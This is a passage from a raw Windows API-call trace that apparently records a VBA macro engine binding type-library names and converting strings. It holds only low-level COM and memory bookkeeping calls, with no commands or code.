riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f88 | out: ppvObject=0x144f88*=0x0) returned 0x80004002 [0068.410] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.410] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.410] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f8 | out: ppvObject=0x1450f8*=0x0) returned 0x80004002 [0068.410] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1450f0 | out: ppvObject=0x1450f0*=0x0) returned 0x80004002 [0068.410] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144930, pIndex=0x0 | out: ppTLib=0x144930*=0x665ba50, pIndex=0x0) returned 0x0 [0068.410] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144940, pDummy=0x0 | out: ppTLibAttr=0x144940, pDummy=0x0) returned 0x0 [0068.410] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.410] IUnknown:Release (This=0x665ba50) returned 0xb [0068.410] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144930, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.410] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144930, pbstrName=0x0, pwOrdinal=0x144950 | out: pBstrDllName=0x144930*=0x0, pbstrName=0x0, pwOrdinal=0x144950*=0x4bc0) returned 0x0 [0068.410] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144930, pwOrdinal=0x500000000) returned 0x0 [0068.410] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.410] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.410] GetCurrentProcess () returned 0xffffffffffffffff [0068.410] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x3d) returned 1 [0068.410] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.410] ITypeComp:RemoteBind (in: This=0x665ba60, szName="dAU_DoAQ", lHashVal=0x10f260, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba22de, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="dAU_DoAQ") returned 9 [0068.410] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="dAU_DoAQ", lHashVal=0x10f260, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba22de, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="dAU_DoAQ") returned 9 [0068.411] ITypeComp:RemoteBind (in: This=0x665bd30, szName="dAU_DoAQ", lHashVal=0x10f260, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.411] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dAU_DoAQ") returned 0x10f260 [0068.411] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="dAU_DoAQ" | out: _Dst="dAU_DoAQ") returned 0x0 [0068.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="dAU_DoAQ") returned 9 [0068.411] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.411] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="dAU_DoAQ", lHashVal=0x10f260, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.411] IUnknown:Release (This=0x665ba50) returned 0xb [0068.411] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.411] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="dAU_DoAQ", lHashVal=0x10f260, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.411] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.411] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.411] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="dAU_DoAQ", lHashVal=0x10f260, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.411] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.411] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.411] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="dAU_DoAQ", lHashVal=0x10f260, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.411] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba22de, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="dAU_DoAQ") returned 9 [0068.411] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="dAU_DoAQ", lHashVal=0x10f260, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.411] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.411] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba22de | out: _Dst=0x67c2d60) returned 0x0 [0068.411] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_dAU_DoAQ") returned 0x10c9e9 [0068.411] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_dAU_DoAQ" | out: _Dst="_B_var_dAU_DoAQ") returned 0x0 [0068.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_dAU_DoAQ") returned 16 [0068.412] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.412] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_dAU_DoAQ", lHashVal=0x10c9e9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.412] IUnknown:Release (This=0x665ba50) returned 0xb [0068.412] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.412] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_dAU_DoAQ", lHashVal=0x10c9e9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.412] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.412] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.412] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_dAU_DoAQ", lHashVal=0x10c9e9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.412] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.412] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.412] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_dAU_DoAQ", lHashVal=0x10c9e9, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.412] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.412] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.412] IUnknown:Release (This=0x665ba50) returned 0xb [0068.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc175a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_dAU_DoAQ") returned 16 [0068.412] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_dAU_DoAQ", lHashVal=0x10c9e9, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x64005f00720061, ppTypeComp=0x44005f00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x64005f00720061, ppTypeComp=0x44005f00000000, pDummy=0x0) returned 0x0 [0068.412] IMalloc:Realloc (This=0x7fefec05380, pv=0x62ba930, cb=0x1000) returned 0x6844090 [0068.412] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba22de | out: _Dst=0x145020) returned 0x0 [0068.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba23da, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="IQAAAkQD") returned 9 [0068.414] ITypeComp:RemoteBind (in: This=0x665ba60, szName="IQAAAkQD", lHashVal=0x109ee8, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba23da, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="IQAAAkQD") returned 9 [0068.414] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="IQAAAkQD", lHashVal=0x109ee8, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba23da, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="IQAAAkQD") returned 9 [0068.414] ITypeComp:RemoteBind (in: This=0x665bd30, szName="IQAAAkQD", lHashVal=0x109ee8, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.415] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IQAAAkQD") returned 0x109ee8 [0068.415] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="IQAAAkQD" | out: _Dst="IQAAAkQD") returned 0x0 [0068.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="IQAAAkQD") returned 9 [0068.415] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.415] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="IQAAAkQD", lHashVal=0x109ee8, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.415] IUnknown:Release (This=0x665ba50) returned 0xb [0068.415] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.415] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="IQAAAkQD", lHashVal=0x109ee8, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.415] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.415] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.415] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="IQAAAkQD", lHashVal=0x109ee8, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.415] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.415] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.415] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="IQAAAkQD", lHashVal=0x109ee8, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.415] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba23da, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="IQAAAkQD") returned 9 [0068.415] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="IQAAAkQD", lHashVal=0x109ee8, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.415] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.415] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba23da | out: _Dst=0x67c2d60) returned 0x0 [0068.415] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_IQAAAkQD") returned 0x107671 [0068.415] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_IQAAAkQD" | out: _Dst="_B_var_IQAAAkQD") returned 0x0 [0068.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_IQAAAkQD") returned 16 [0068.415] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.415] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_IQAAAkQD", lHashVal=0x107671, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.415] IUnknown:Release (This=0x665ba50) returned 0xb [0068.415] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.415] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_IQAAAkQD", lHashVal=0x107671, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.416] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.416] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.416] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_IQAAAkQD", lHashVal=0x107671, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.416] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.416] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.416] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_IQAAAkQD", lHashVal=0x107671, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.416] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.416] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.416] IUnknown:Release (This=0x665ba50) returned 0xb [0068.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc178a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_IQAAAkQD") returned 16 [0068.416] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_IQAAAkQD", lHashVal=0x107671, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x49005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x49005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0068.416] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba23da | out: _Dst=0x145020) returned 0x0 [0068.416] ITypeComp:RemoteBind (in: This=0x665ba60, szName="GADXoXX", lHashVal=0x10c8d3, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba23b2, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="GADXoXX") returned 8 [0068.416] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="GADXoXX", lHashVal=0x10c8d3, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba23b2, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="GADXoXX") returned 8 [0068.416] ITypeComp:RemoteBind (in: This=0x665bd30, szName="GADXoXX", lHashVal=0x10c8d3, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.416] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GADXoXX") returned 0x10c8d3 [0068.416] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="GADXoXX" | out: _Dst="GADXoXX") returned 0x0 [0068.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="GADXoXX") returned 8 [0068.416] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.417] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="GADXoXX", lHashVal=0x10c8d3, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.417] IUnknown:Release (This=0x665ba50) returned 0xb [0068.417] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.417] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="GADXoXX", lHashVal=0x10c8d3, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.417] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.417] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.417] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="GADXoXX", lHashVal=0x10c8d3, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.417] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.417] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.417] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="GADXoXX", lHashVal=0x10c8d3, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.417] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba23b2, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="GADXoXX") returned 8 [0068.417] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="GADXoXX", lHashVal=0x10c8d3, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.417] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.417] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba23b2 | out: _Dst=0x67c2d60) returned 0x0 [0068.417] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_GADXoXX") returned 0x10cc57 [0068.417] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_GADXoXX" | out: _Dst="_B_var_GADXoXX") returned 0x0 [0068.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_GADXoXX") returned 15 [0068.417] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.417] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_GADXoXX", lHashVal=0x10cc57, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.417] IUnknown:Release (This=0x665ba50) returned 0xb [0068.417] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.417] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_GADXoXX", lHashVal=0x10cc57, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.417] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.417] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.418] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_GADXoXX", lHashVal=0x10cc57, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.418] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.418] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.418] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_GADXoXX", lHashVal=0x10cc57, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.418] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.418] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.418] IUnknown:Release (This=0x665ba50) returned 0xb [0068.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc17ba, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_GADXoXX") returned 15 [0068.418] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_GADXoXX", lHashVal=0x10cc57, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x47005f00720061, ppTypeComp=0x6f005800000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x47005f00720061, ppTypeComp=0x6f005800000000, pDummy=0x0) returned 0x0 [0068.418] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba23b2 | out: _Dst=0x145020) returned 0x0 [0068.418] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MAQQkQAc", lHashVal=0x1014e7, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2406, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="MAQQkQAc") returned 9 [0068.418] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MAQQkQAc", lHashVal=0x1014e7, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2406, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="MAQQkQAc") returned 9 [0068.418] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MAQQkQAc", lHashVal=0x1014e7, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.418] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MAQQkQAc") returned 0x1014e7 [0068.418] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="MAQQkQAc" | out: _Dst="MAQQkQAc") returned 0x0 [0068.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, 